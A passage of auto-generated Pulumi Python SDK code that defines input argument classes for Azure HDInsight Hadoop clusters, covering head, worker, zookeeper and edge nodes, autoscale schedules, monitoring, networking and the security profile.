def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class HadoopClusterMonitorArgs:
def __init__(__self__, *,
log_analytics_workspace_id: pulumi.Input[str],
primary_key: pulumi.Input[str]):
"""
:param pulumi.Input[str] log_analytics_workspace_id: The Operations Management Suite (OMS) workspace ID.
:param pulumi.Input[str] primary_key: The Operations Management Suite (OMS) workspace key.
"""
pulumi.set(__self__, "log_analytics_workspace_id", log_analytics_workspace_id)
pulumi.set(__self__, "primary_key", primary_key)
@property
@pulumi.getter(name="logAnalyticsWorkspaceId")
def log_analytics_workspace_id(self) -> pulumi.Input[str]:
"""
The Operations Management Suite (OMS) workspace ID.
"""
return pulumi.get(self, "log_analytics_workspace_id")
@log_analytics_workspace_id.setter
def log_analytics_workspace_id(self, value: pulumi.Input[str]):
pulumi.set(self, "log_analytics_workspace_id", value)
@property
@pulumi.getter(name="primaryKey")
def primary_key(self) -> pulumi.Input[str]:
"""
The Operations Management Suite (OMS) workspace key.
"""
return pulumi.get(self, "primary_key")
@primary_key.setter
def primary_key(self, value: pulumi.Input[str]):
pulumi.set(self, "primary_key", value)
@pulumi.input_type
class HadoopClusterNetworkArgs:
def __init__(__self__, *,
connection_direction: Optional[pulumi.Input[str]] = None,
private_link_enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] connection_direction: The direction of the resource provider connection. Possible values include `Inbound` or `Outbound`. Defaults to `Inbound`. Changing this forces a new resource to be created.
:param pulumi.Input[bool] private_link_enabled: Is the private link enabled? Possible values include `True` or `False`. Defaults to `False`. Changing this forces a new resource to be created.
"""
if connection_direction is not None:
pulumi.set(__self__, "connection_direction", connection_direction)
if private_link_enabled is not None:
pulumi.set(__self__, "private_link_enabled", private_link_enabled)
@property
@pulumi.getter(name="connectionDirection")
def connection_direction(self) -> Optional[pulumi.Input[str]]:
"""
The direction of the resource provider connection. Possible values include `Inbound` or `Outbound`. Defaults to `Inbound`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "connection_direction")
@connection_direction.setter
def connection_direction(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "connection_direction", value)
@property
@pulumi.getter(name="privateLinkEnabled")
def private_link_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the private link enabled? Possible values include `True` or `False`. Defaults to `False`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "private_link_enabled")
@private_link_enabled.setter
def private_link_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "private_link_enabled", value)
@pulumi.input_type
class HadoopClusterRolesArgs:
def __init__(__self__, *,
head_node: pulumi.Input['HadoopClusterRolesHeadNodeArgs'],
worker_node: pulumi.Input['HadoopClusterRolesWorkerNodeArgs'],
zookeeper_node: pulumi.Input['HadoopClusterRolesZookeeperNodeArgs'],
edge_node: Optional[pulumi.Input['HadoopClusterRolesEdgeNodeArgs']] = None):
"""
:param pulumi.Input['HadoopClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
:param pulumi.Input['HadoopClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
:param pulumi.Input['HadoopClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
:param pulumi.Input['HadoopClusterRolesEdgeNodeArgs'] edge_node: A `edge_node` block as defined below.
"""
pulumi.set(__self__, "head_node", head_node)
pulumi.set(__self__, "worker_node", worker_node)
pulumi.set(__self__, "zookeeper_node", zookeeper_node)
if edge_node is not None:
pulumi.set(__self__, "edge_node", edge_node)
@property
@pulumi.getter(name="headNode")
def head_node(self) -> pulumi.Input['HadoopClusterRolesHeadNodeArgs']:
"""
A `head_node` block as defined above.
"""
return pulumi.get(self, "head_node")
@head_node.setter
def head_node(self, value: pulumi.Input['HadoopClusterRolesHeadNodeArgs']):
pulumi.set(self, "head_node", value)
@property
@pulumi.getter(name="workerNode")
def worker_node(self) -> pulumi.Input['HadoopClusterRolesWorkerNodeArgs']:
"""
A `worker_node` block as defined below.
"""
return pulumi.get(self, "worker_node")
@worker_node.setter
def worker_node(self, value: pulumi.Input['HadoopClusterRolesWorkerNodeArgs']):
pulumi.set(self, "worker_node", value)
@property
@pulumi.getter(name="zookeeperNode")
def zookeeper_node(self) -> pulumi.Input['HadoopClusterRolesZookeeperNodeArgs']:
"""
A `zookeeper_node` block as defined below.
"""
return pulumi.get(self, "zookeeper_node")
@zookeeper_node.setter
def zookeeper_node(self, value: pulumi.Input['HadoopClusterRolesZookeeperNodeArgs']):
pulumi.set(self, "zookeeper_node", value)
@property
@pulumi.getter(name="edgeNode")
def edge_node(self) -> Optional[pulumi.Input['HadoopClusterRolesEdgeNodeArgs']]:
"""
A `edge_node` block as defined below.
"""
return pulumi.get(self, "edge_node")
@edge_node.setter
def edge_node(self, value: Optional[pulumi.Input['HadoopClusterRolesEdgeNodeArgs']]):
pulumi.set(self, "edge_node", value)
@pulumi.input_type
class HadoopClusterRolesEdgeNodeArgs:
def __init__(__self__, *,
install_script_actions: pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesEdgeNodeInstallScriptActionArgs']]],
target_instance_count: pulumi.Input[int],
vm_size: pulumi.Input[str]):
"""
:param pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesEdgeNodeInstallScriptActionArgs']]] install_script_actions: A `install_script_action` block as defined below.
:param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Edge Nodes. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "install_script_actions", install_script_actions)
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "vm_size", vm_size)
@property
@pulumi.getter(name="installScriptActions")
def install_script_actions(self) -> pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesEdgeNodeInstallScriptActionArgs']]]:
"""
A `install_script_action` block as defined below.
"""
return pulumi.get(self, "install_script_actions")
@install_script_actions.setter
def install_script_actions(self, value: pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesEdgeNodeInstallScriptActionArgs']]]):
pulumi.set(self, "install_script_actions", value)
@property
@pulumi.getter(name="targetInstanceCount")
def target_instance_count(self) -> pulumi.Input[int]:
"""
The number of instances which should be run for the Worker Nodes.
"""
return pulumi.get(self, "target_instance_count")
@target_instance_count.setter
def target_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "target_instance_count", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Edge Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@pulumi.input_type
class HadoopClusterRolesEdgeNodeInstallScriptActionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
uri: pulumi.Input[str]):
"""
:param pulumi.Input[str] name: The name of the install script action. Changing this forces a new resource to be created.
:param pulumi.Input[str] uri: The URI pointing to the script to run during the installation of the edge node. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "uri", uri)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the install script action. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def uri(self) -> pulumi.Input[str]:
"""
The URI pointing to the script to run during the installation of the edge node. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "uri")
@uri.setter
def uri(self, value: pulumi.Input[str]):
pulumi.set(self, "uri", value)
@pulumi.input_type
class HadoopClusterRolesHeadNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class HadoopClusterRolesWorkerNodeArgs:
def __init__(__self__, *,
target_instance_count: pulumi.Input[int],
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
autoscale: Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleArgs']] = None,
min_instance_count: Optional[pulumi.Input[int]] = None,
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
:param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleArgs'] autoscale: A `autoscale` block as defined below.
:param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if autoscale is not None:
pulumi.set(__self__, "autoscale", autoscale)
if min_instance_count is not None:
warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
if min_instance_count is not None:
pulumi.set(__self__, "min_instance_count", min_instance_count)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter(name="targetInstanceCount")
def target_instance_count(self) -> pulumi.Input[int]:
"""
The number of instances which should be run for the Worker Nodes.
"""
return pulumi.get(self, "target_instance_count")
@target_instance_count.setter
def target_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "target_instance_count", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def autoscale(self) -> Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleArgs']]:
"""
A `autoscale` block as defined below.
"""
return pulumi.get(self, "autoscale")
@autoscale.setter
def autoscale(self, value: Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleArgs']]):
pulumi.set(self, "autoscale", value)
@property
@pulumi.getter(name="minInstanceCount")
def min_instance_count(self) -> Optional[pulumi.Input[int]]:
"""
The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "min_instance_count")
@min_instance_count.setter
def min_instance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_instance_count", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class HadoopClusterRolesWorkerNodeAutoscaleArgs:
def __init__(__self__, *,
capacity: Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleCapacityArgs']] = None,
recurrence: Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceArgs']] = None):
"""
:param pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleCapacityArgs'] capacity: A `capacity` block as defined below.
:param pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceArgs'] recurrence: A `recurrence` block as defined below.
"""
if capacity is not None:
pulumi.set(__self__, "capacity", capacity)
if recurrence is not None:
pulumi.set(__self__, "recurrence", recurrence)
@property
@pulumi.getter
def capacity(self) -> Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleCapacityArgs']]:
"""
A `capacity` block as defined below.
"""
return pulumi.get(self, "capacity")
@capacity.setter
def capacity(self, value: Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleCapacityArgs']]):
pulumi.set(self, "capacity", value)
@property
@pulumi.getter
def recurrence(self) -> Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]:
"""
A `recurrence` block as defined below.
"""
return pulumi.get(self, "recurrence")
@recurrence.setter
def recurrence(self, value: Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]):
pulumi.set(self, "recurrence", value)
@pulumi.input_type
class HadoopClusterRolesWorkerNodeAutoscaleCapacityArgs:
def __init__(__self__, *,
max_instance_count: pulumi.Input[int],
min_instance_count: pulumi.Input[int]):
"""
:param pulumi.Input[int] max_instance_count: The maximum number of worker nodes to autoscale to based on the cluster's activity.
:param pulumi.Input[int] min_instance_count: The minimum number of worker nodes to autoscale to based on the cluster's activity.
"""
pulumi.set(__self__, "max_instance_count", max_instance_count)
pulumi.set(__self__, "min_instance_count", min_instance_count)
@property
@pulumi.getter(name="maxInstanceCount")
def max_instance_count(self) -> pulumi.Input[int]:
"""
The maximum number of worker nodes to autoscale to based on the cluster's activity.
"""
return pulumi.get(self, "max_instance_count")
@max_instance_count.setter
def max_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "max_instance_count", value)
@property
@pulumi.getter(name="minInstanceCount")
def min_instance_count(self) -> pulumi.Input[int]:
"""
The minimum number of worker nodes to autoscale to based on the cluster's activity.
"""
return pulumi.get(self, "min_instance_count")
@min_instance_count.setter
def min_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "min_instance_count", value)
@pulumi.input_type
class HadoopClusterRolesWorkerNodeAutoscaleRecurrenceArgs:
def __init__(__self__, *,
schedules: pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]],
timezone: pulumi.Input[str]):
"""
:param pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]] schedules: A list of `schedule` blocks as defined below.
:param pulumi.Input[str] timezone: The time zone for the autoscale schedule times.
"""
pulumi.set(__self__, "schedules", schedules)
pulumi.set(__self__, "timezone", timezone)
@property
@pulumi.getter
def schedules(self) -> pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]:
"""
A list of `schedule` blocks as defined below.
"""
return pulumi.get(self, "schedules")
@schedules.setter
def schedules(self, value: pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]):
pulumi.set(self, "schedules", value)
@property
@pulumi.getter
def timezone(self) -> pulumi.Input[str]:
"""
The time zone for the autoscale schedule times.
"""
return pulumi.get(self, "timezone")
@timezone.setter
def timezone(self, value: pulumi.Input[str]):
pulumi.set(self, "timezone", value)
@pulumi.input_type
class HadoopClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs:
def __init__(__self__, *,
days: pulumi.Input[Sequence[pulumi.Input[str]]],
target_instance_count: pulumi.Input[int],
time: pulumi.Input[str]):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] days: The days of the week to perform autoscale.
:param pulumi.Input[int] target_instance_count: The number of worker nodes to autoscale at the specified time.
:param pulumi.Input[str] time: The time of day to perform the autoscale in 24hour format.
"""
pulumi.set(__self__, "days", days)
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "time", time)
@property
@pulumi.getter
def days(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
The days of the week to perform autoscale.
"""
return pulumi.get(self, "days")
@days.setter
def days(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "days", value)
@property
@pulumi.getter(name="targetInstanceCount")
def target_instance_count(self) -> pulumi.Input[int]:
"""
The number of worker nodes to autoscale at the specified time.
"""
return pulumi.get(self, "target_instance_count")
@target_instance_count.setter
def target_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "target_instance_count", value)
@property
@pulumi.getter
def time(self) -> pulumi.Input[str]:
"""
The time of day to perform the autoscale in 24hour format.
"""
return pulumi.get(self, "time")
@time.setter
def time(self, value: pulumi.Input[str]):
pulumi.set(self, "time", value)
@pulumi.input_type
class HadoopClusterRolesZookeeperNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class HadoopClusterSecurityProfileArgs:
def __init__(__self__, *,
aadds_resource_id: pulumi.Input[str],
domain_name: pulumi.Input[str],
domain_user_password: pulumi.Input[str],
domain_username: pulumi.Input[str],
ldaps_urls: pulumi.Input[Sequence[pulumi.Input[str]]],
msi_resource_id: pulumi.Input[str],
cluster_users_group_dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] aadds_resource_id: The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_name: The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_user_password: The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_username: The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ldaps_urls: A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
:param pulumi.Input[str] msi_resource_id: The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] cluster_users_group_dns: A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "aadds_resource_id", aadds_resource_id)
pulumi.set(__self__, "domain_name", domain_name)
pulumi.set(__self__, "domain_user_password", domain_user_password)
pulumi.set(__self__, "domain_username", domain_username)
pulumi.set(__self__, "ldaps_urls", ldaps_urls)
pulumi.set(__self__, "msi_resource_id", msi_resource_id)
if cluster_users_group_dns is not None:
pulumi.set(__self__, "cluster_users_group_dns", cluster_users_group_dns)
@property
@pulumi.getter(name="aaddsResourceId")
def aadds_resource_id(self) -> pulumi.Input[str]:
"""
The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "aadds_resource_id")
@aadds_resource_id.setter
def aadds_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "aadds_resource_id", value)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Input[str]:
"""
The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="domainUserPassword")
def domain_user_password(self) -> pulumi.Input[str]:
"""
The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_user_password")
@domain_user_password.setter
def domain_user_password(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_user_password", value)
@property
@pulumi.getter(name="domainUsername")
def domain_username(self) -> pulumi.Input[str]:
"""
The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_username")
@domain_username.setter
def domain_username(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_username", value)
@property
@pulumi.getter(name="ldapsUrls")
def ldaps_urls(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ldaps_urls")
@ldaps_urls.setter
def ldaps_urls(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "ldaps_urls", value)
@property
@pulumi.getter(name="msiResourceId")
def msi_resource_id(self) -> pulumi.Input[str]:
"""
The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "msi_resource_id")
@msi_resource_id.setter
def msi_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "msi_resource_id", value)
@property
@pulumi.getter(name="clusterUsersGroupDns")
def cluster_users_group_dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "cluster_users_group_dns")
@cluster_users_group_dns.setter
def cluster_users_group_dns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "cluster_users_group_dns", value)
@pulumi.input_type
class HadoopClusterStorageAccountArgs:
def __init__(__self__, *,
is_default: pulumi.Input[bool],
storage_account_key: pulumi.Input[str],
storage_container_id: pulumi.Input[str]):
"""
:param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
